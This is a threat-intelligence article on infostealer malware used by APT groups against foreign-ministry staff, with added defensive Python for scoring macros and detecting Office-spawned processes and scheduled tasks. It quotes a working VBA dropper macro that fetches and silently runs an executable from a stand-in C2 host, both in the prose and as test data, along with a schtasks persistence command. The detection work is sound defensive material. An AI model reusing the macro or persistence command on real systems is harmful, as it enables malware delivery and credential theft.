Infostealer Malware is Being Exploited by APT Groups for Targeted Attacks

Infostealer malware, originally created to indiscriminately collect credentials from compromised systems, has been adapted for use by state-sponsored Advanced Persistent Threat (APT) groups.

Since early 2023, malware families like RedLine, Lumma, and StealC have spread through phishing campaigns and malicious downloads.

These infostealers typically extract browser data, cookies, and system information. Recent intelligence, however, shows that stolen credentials are now being used for targeted espionage activities.

The primary attack methods for infostealers include spear-phishing emails containing macro-enabled documents or fake software installers.

Victims often receive a Word attachment with a VBA macro that, once enabled, downloads the malicious payload from a command-and-control (C2) server.

Upon execution, the malware identifies and exfiltrates stored credentials for email, VPN, and corporate SSO portals.

Analysts have observed compromised diplomatic credentials from multiple Ministries of Foreign Affairs appearing in darknet exchanges, providing access to high-value targets.

Impact assessments reveal that when APT groups obtain valid diplomatic mailbox credentials—often via infostealer infections—they can create spear-phishing campaigns that appear highly credible.

These campaigns effectively bypass traditional detection by using trusted sender reputations and valid TLS certificates.

By mid-2025, Hudson Rock’s threat intelligence platform identified over 1,400 compromised users at Qatar’s Ministry of Foreign Affairs, along with hundreds more in Saudi Arabia, South Korea, and the UAE, highlighting the global scope of this threat.

In a notable incident, a compromised Omani embassy account in Paris was used to send malicious invitations to UN officials. The email contained a Word document with a “sysProcUpdate” macro executing the following VBA code snippet:

Sub AutoOpen()
    Dim objXML As Object
    Set objXML = CreateObject("MSXML2.XMLHTTP")
    objXML.Open "GET", "https://malicious.c2.server/payload.exe", False
    objXML.Send
    If objXML.Status = 200 Then
        With CreateObject("ADODB.Stream")
            .Type = 1
            .Open
            .Write objXML.responseBody
            .SaveToFile Environ("TEMP") & "\update.exe", 2
        End With
        Shell Environ("TEMP") & "\update.exe", vbHide
    End If
End Sub
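
The macro above is a compact dropper: an auto-execute entry point, an HTTP download object, a binary file write into the user's temp directory, and a hidden process launch. A defender triaging a suspicious attachment can score extracted macro text for exactly that combination. The following Python is an added example, not code from the article or from any vendor it names; it assumes the VBA source has already been extracted from the document (tools such as olevba do that step), embeds the article's snippet and a constructed benign macro as sample input, and uses indicator weights and thresholds that are this example's own choice.

```python
import re
from dataclasses import dataclass, field

# Indicator table for the dropper pattern: (name, regex, weight).
# Weights and verdict thresholds are this example's own assumptions, not a published scale.
INDICATORS = [
    ("auto_exec",     re.compile(r"\b(AutoOpen|AutoExec|Document_Open|Workbook_Open)\b", re.I), 3),
    ("http_object",   re.compile(r'CreateObject\s*\(\s*"(MSXML2\.(Server)?XMLHTTP|WinHttp\.WinHttpRequest)[^"]*"', re.I), 3),
    ("binary_stream", re.compile(r'CreateObject\s*\(\s*"ADODB\.Stream"', re.I), 2),
    ("file_write",    re.compile(r"\.SaveToFile\b", re.I), 2),
    ("temp_path",     re.compile(r'Environ\s*\(\s*"(TEMP|TMP|APPDATA|LOCALAPPDATA)"\s*\)', re.I), 1),
    ("exec",          re.compile(r"\b(Shell|ShellExecute|WScript\.Shell|CreateProcess)\b", re.I), 3),
    ("hidden_window", re.compile(r"\bvbHide\b", re.I), 1),
    ("url",           re.compile(r"https?://[^\s\"']+", re.I), 1),
]
URL_RE = INDICATORS[-1][1]


@dataclass
class TriageResult:
    score: int = 0
    matched: list = field(default_factory=list)   # indicator names that fired
    urls: list = field(default_factory=list)      # literal URLs found in the source
    dropper_chain: bool = False                   # download + write + execute all present

    @property
    def verdict(self) -> str:
        if self.dropper_chain or self.score >= 8:
            return "high"
        if self.score >= 4:
            return "medium"
        return "low"


def normalize(source: str) -> str:
    """Drop comment lines and undo the simplest string-splitting trick ("MSX" & "ML2"),
    including splits across a VBA line continuation, so the regexes see whole strings."""
    lines = [ln for ln in source.splitlines() if not ln.lstrip().startswith("'")]
    return re.sub(r'"\s*&\s*_?\s*"', "", "\n".join(lines))


def triage_macro(source: str) -> TriageResult:
    """Score macro source text against the indicator table and flag the full dropper chain."""
    text = normalize(source)
    result = TriageResult()
    for name, pattern, weight in INDICATORS:
        if pattern.search(text):
            result.matched.append(name)
            result.score += weight
    result.urls = sorted(set(URL_RE.findall(text)))
    fired = set(result.matched)
    result.dropper_chain = (
        "http_object" in fired
        and ("file_write" in fired or "binary_stream" in fired)
        and "exec" in fired
    )
    return result


# Sample input: the dropper macro quoted in the article, embedded here as test data.
SAMPLE_DROPPER_MACRO = r'''
Sub AutoOpen()
    Dim objXML As Object
    Set objXML = CreateObject("MSXML2.XMLHTTP")
    objXML.Open "GET", "https://malicious.c2.server/payload.exe", False
    objXML.Send
    If objXML.Status = 200 Then
        With CreateObject("ADODB.Stream")
            .Type = 1
            .Open
            .Write objXML.responseBody
            .SaveToFile Environ("TEMP") & "\update.exe", 2
        End With
        Shell Environ("TEMP") & "\update.exe", vbHide
    End If
End Sub
'''

# Constructed benign macro (formatting only) to show the low end of the scale.
SAMPLE_BENIGN_MACRO = r'''
Sub FormatReport()
    ' Bold the title and centre it
    ActiveDocument.Paragraphs(1).Range.Font.Bold = True
    Selection.ParagraphFormat.Alignment = wdAlignParagraphCenter
End Sub
'''

if __name__ == "__main__":
    for label, src in (("dropper", SAMPLE_DROPPER_MACRO), ("benign", SAMPLE_BENIGN_MACRO)):
        r = triage_macro(src)
        print(f"{label}: verdict={r.verdict} score={r.score} chain={r.dropper_chain} "
              f"matched={r.matched} urls={r.urls}")
```

The `dropper_chain` flag matters more than the raw score: a macro that downloads, writes and executes is a dropper whatever else it contains, while a macro that only references `Shell` may be legitimate automation. The normalisation step covers only trivial string splitting; heavier obfuscation (Chr() building, StrReverse, encoded payloads) needs dynamic analysis rather than regexes.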

Following its delivery, the “update.exe” payload establishes persistence by creating a Windows Scheduled Task:

schtasks /Create /SC MINUTE /MO 15 /TN "SysProcUpdate" /TR "%TEMP%\update.exe"

Researchers have identified that this persistence mechanism ensures the malware executes repeatedly, even after system reboots, allowing long-term access.
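
The delivery and persistence steps just described leave two reliable traces in endpoint telemetry: an Office process spawning a child executable, and a `schtasks /Create` whose action runs a binary from a user-writable directory on a short interval. The Python below is an added example, not code from the article or from any vendor it names. It runs those checks over a handful of constructed process-creation events whose field names are modelled on Sysmon Event ID 1 (Image, ParentImage, CommandLine, User); the allowlist, the path patterns and the sixty-minute interval threshold are this example's own assumptions.

```python
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Children Office legitimately spawns; this example's own minimal allowlist.
OFFICE_CHILD_ALLOWLIST = {"splwow64.exe"}
# Directories an ordinary user can write to, in both %VAR% and expanded forms.
USER_WRITABLE = re.compile(
    r"(%TEMP%|%TMP%|%APPDATA%|%LOCALAPPDATA%|\\AppData\\(Local|Roaming)\\|\\Users\\Public\\|\\Temp\\)",
    re.I,
)
MAX_MINUTES = 60  # a MINUTE schedule at or under this interval counts as high frequency


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_schtasks(cmdline: str) -> dict:
    """Parse schtasks-style /SWITCH [value] pairs; switches without a value map to None.
    Values may be quoted ("%TEMP%\\update.exe") or bare (MINUTE, 15)."""
    opts = {}
    for m in re.finditer(r'/(\w+)(?:\s+("([^"]*)"|[^\s/][^\s]*))?', cmdline):
        value = m.group(3) if m.group(3) is not None else m.group(2)
        opts[m.group(1).upper()] = value
    return opts


def analyze_event(ev: dict) -> list:
    """Return (finding_name, detail) pairs for one process-creation event."""
    findings = []
    image, parent = basename(ev["Image"]), basename(ev["ParentImage"])

    if parent in OFFICE_APPS and image not in OFFICE_CHILD_ALLOWLIST:
        findings.append(("office_child_process", f"{parent} spawned {image}"))

    if USER_WRITABLE.search(ev["Image"]):
        findings.append(("exec_from_user_writable_dir", ev["Image"]))

    if image == "schtasks.exe":
        opts = parse_schtasks(ev["CommandLine"])
        if "CREATE" in opts:
            action = opts.get("TR") or ""
            if USER_WRITABLE.search(action):
                findings.append(("schtask_runs_from_user_writable_dir", action))
            schedule, modifier = (opts.get("SC") or "").upper(), opts.get("MO")
            # /SC MINUTE with no /MO means every minute; otherwise /MO is the interval.
            if schedule == "MINUTE" and (modifier is None or (modifier.isdigit() and int(modifier) <= MAX_MINUTES)):
                findings.append(("schtask_high_frequency", f"every {modifier or 1} minute(s)"))
    return findings


def scan_events(events: list) -> list:
    """Run analyze_event over a list of events; return only the events that produced findings."""
    flagged = []
    for idx, ev in enumerate(events):
        hits = analyze_event(ev)
        if hits:
            flagged.append({"index": idx, "image": ev["Image"], "user": ev["User"], "findings": hits})
    return flagged


WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
# Constructed sample telemetry: the article's chain (docm -> update.exe -> schtasks)
# plus two benign events to show what does not fire.
SAMPLE_EVENTS = [
    {"Image": WINWORD, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\Invitation.docm"', "User": r"CORP\alice"},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\update.exe", "ParentImage": WINWORD,
     "CommandLine": r"C:\Users\alice\AppData\Local\Temp\update.exe", "User": r"CORP\alice"},
    {"Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "CommandLine": r'schtasks /Create /SC MINUTE /MO 15 /TN "SysProcUpdate" /TR "%TEMP%\update.exe"', "User": r"CORP\alice"},
    {"Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r'schtasks /Create /SC DAILY /ST 03:00 /TN "Backup" /TR "C:\Program Files\Backup\backup.exe"', "User": "NT AUTHORITY\\SYSTEM"},
    {"Image": r"C:\Windows\splwow64.exe", "ParentImage": WINWORD,
     "CommandLine": r"C:\Windows\splwow64.exe 12288", "User": r"CORP\alice"},
]

if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(f"event {hit['index']} {hit['user']} {hit['image']}")
        for name, detail in hit["findings"]:
            print(f"    {name}: {detail}")
```

Each finding is low-confidence on its own (users do run installers from Downloads, and admins do create tasks), so in a real pipeline the value comes from correlating them per user and time window: an Office child process followed within minutes by a task creation pointing back into the same temp directory is the chain the article describes. `parse_schtasks` is deliberately simple and would mis-split a bare, unquoted value containing `/`; the quoted form seen in the article parses correctly.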

Infection Mechanism

Infostealers exploit user trust and inadequate endpoint controls in their infection mechanisms.

Once initial compromise occurs via phishing, the payload uses common Windows APIs—such as CryptUnprotectData—to decrypt stored credentials from browsers and the Windows Credential Manager.

The exfiltration module then packages harvested data into encrypted blobs, transmitting them over HTTPS to evade intrusion detection systems.

Once credentials reach the attacker’s infrastructure, APT groups use them as legitimate logins; where a service accepts only a username and password and enforces no multi-factor authentication, nothing further stands between the stolen credential and the account.

By embedding the malware within routine-looking documents and mimicking legitimate maintenance tasks, infostealers maintain a low-and-slow profile, making detection exceptionally challenging.

This seamless exploitation of credential theft for targeted campaigns signifies a concerning evolution in cyber-espionage tactics.